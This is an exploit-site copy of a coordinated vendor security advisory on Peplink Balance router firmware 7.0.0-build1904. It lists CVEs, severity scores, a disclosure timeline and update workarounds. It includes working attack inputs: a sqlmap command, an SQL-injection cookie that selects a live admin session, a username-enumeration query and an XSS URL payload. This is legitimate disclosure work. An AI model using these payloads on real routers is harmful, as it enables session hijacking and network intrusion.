Menu

Search for hundreds of thousands of exploits

"Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure"

Author

Exploit author

"X41 D-Sec GmbH"

Platform

Exploit platform

cgi

Release date

Exploit published date

2017-06-06

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
X41 D-Sec GmbH Security Advisory: X41-2017-005

Multiple Vulnerabilities in peplink balance routers
===================================================

Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/


Summary and Impact
------------------
Several issues have been identified, which allow attackers to access the
administrative web interface with admin credentials, delete files,
perform CSRF and XSS attacks.


Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.



SQL Injection via bauth Cookie
==============================
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary and Impact
------------------
Peplink devices are vulnerable to an SQL injection attack via the bauth
cookie parameter which is set e.g. when accessing
https://ip/cgi-bin/MANGA/admin.cgi.

The injection can be checked with the following command:

./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi"
--cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647"
-p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ
--flush-session -t trace.log --prefix "'" --suffix "--" -a

The vulnerability in the Peplink device allows to access the SQLite
session database containing user and session variables. By using the the
following cookie in a web request, it is possible to select a running
administrator session to be used for the attackers login.

bauth=-12' or id IN (select s.id from sessions as s left join
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
or '1'='2

By forming specialised SQL queries, it is possible to retrieve usernames
from the database. This worked by returning a valid session in case the
username existed and no session if it did not exist. In the first case
the server did not set a new session cookie in the response to the request.

SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
from sessions as s left join sessionsvariables as v on v.id=s.id where
v.name='username' and substr(v.value,1,3)='adm')



Workarounds
-----------
Install vendor supplied update.


No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
The CGI scripts in the administrative interface are not protected
against cross site request forgery attacks. This allows an attacker to
execute commands, if a logged in user visits a malicious website. This
can for example be used to change the credentials of the administrative
webinterface.


Workarounds
-----------
Install vendor supplied update.




Passwords stored in Cleartext
=============================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary and Impact
------------------
The Peplink devices store passwords in cleartext in the files
/etc/waipass and /etc/roapass. In case one of these devices is
compromised the attacker can gain access to the cleartext passwords and
abuse them to compromise further systems.


Workarounds
-----------
Install vendor supplied update.




XSS via syncid Parameter
========================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the syncid
parameter to trigger a cross-site-scripting issue by calling
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E

This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.

Workarounds
-----------
Install vendor supplied update.




XSS via preview.cgi
===================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the the
orig_url parameter to trigger a cross-site-scripting issue in
/guest/preview.cgi. The injection is directly into existing JavaScript.

This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.

Workarounds
-----------
Install vendor supplied update.



File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Summary and Impact
------------------
A logged in user can delete arbitrary files on the Peplink devices, by
abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path
is provided to the upfile.path parameter the file provided in the path
is deleted during the process. This can be abused to cause a denial of
service (DoS). In combination with the missing CSRF protection, this can
be abused remotely via a logged in user.

Workarounds
-----------
Install vendor supplied update.




Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary and Impact
------------------
If the webinterface is accessible, it is possible to retrieve sensitive
information without a valid login by opening
cgi-bin/HASync/hasync.cgi?debug=1

This displays the following:

-----8<------------------------------------------------
Master LAN Address    = [ <internal ip> / <netmask> ]
Serial Number         = [ <serial number> ]
HA Group ID           = [ <group id> ]
Virtual IP            = [ <internal ip> / <netmask> ]
Submitted syncid      = [ <syncid> ]
-----8<------------------------------------------------

This information can be valuable for an attacker to exploit other issues.

Workarounds
-----------
Install vendor supplied update.




About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.

Timeline
--------
2017-04-07	Issue found
2017-04-10	Vendor asked for security contact
2017-04-11	Vendor replied, send GPG key
2017-04-11	Information supplied to vendor
2017-04-11	Vendor acknowledges that the information is received
2017-04-17	Vendor acknowledges SQL injection
2017-05-08	CVE IDs for all issues requested
2017-05-08	CVE IDs assigned
2017-05-11	Vendor informed about CVE IDs
2017-05-29	Version provided to X41 for testing
2017-05-31	First test results send back to the vendor
2017-06-01	Remaining test results send back to the vendor
2017-06-05	Coordinated Firmware and Advisory release
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection" webapps cgi "Gabriele Zuddas"
2020-10-29 "Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)" webapps cgi "Valerio Alessandroni"
2020-04-23 "Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)" webapps cgi "Dhiraj Mishra"
2020-04-10 "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" webapps cgi "Basim Alabdullah"
2020-03-30 "Zen Load Balancer 3.10.1 - Remote Code Execution" webapps cgi "Cody Sixteen"
2020-02-11 "CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting" webapps cgi Luca.Chiou
2019-09-09 "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" webapps cgi LiquidWorm
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
Release Date Title Type Platform Author
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - Type Confusion" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2017-11-14 "PSFTPd Windows FTP Server 10.0.4 Build 729 - Log Injection / Use-After-Free" dos windows "X41 D-Sec GmbH"
2017-10-17 "shadowsocks-libev 3.1.0 - Command Execution" local linux "X41 D-Sec GmbH"
2017-10-17 "Shadowsocks - Log File Command Execution" local linux "X41 D-Sec GmbH"
2017-06-06 "Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure" webapps cgi "X41 D-Sec GmbH"
2016-03-10 "libotr 4.1.0 - Memory Corruption" dos multiple "X41 D-Sec GmbH"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.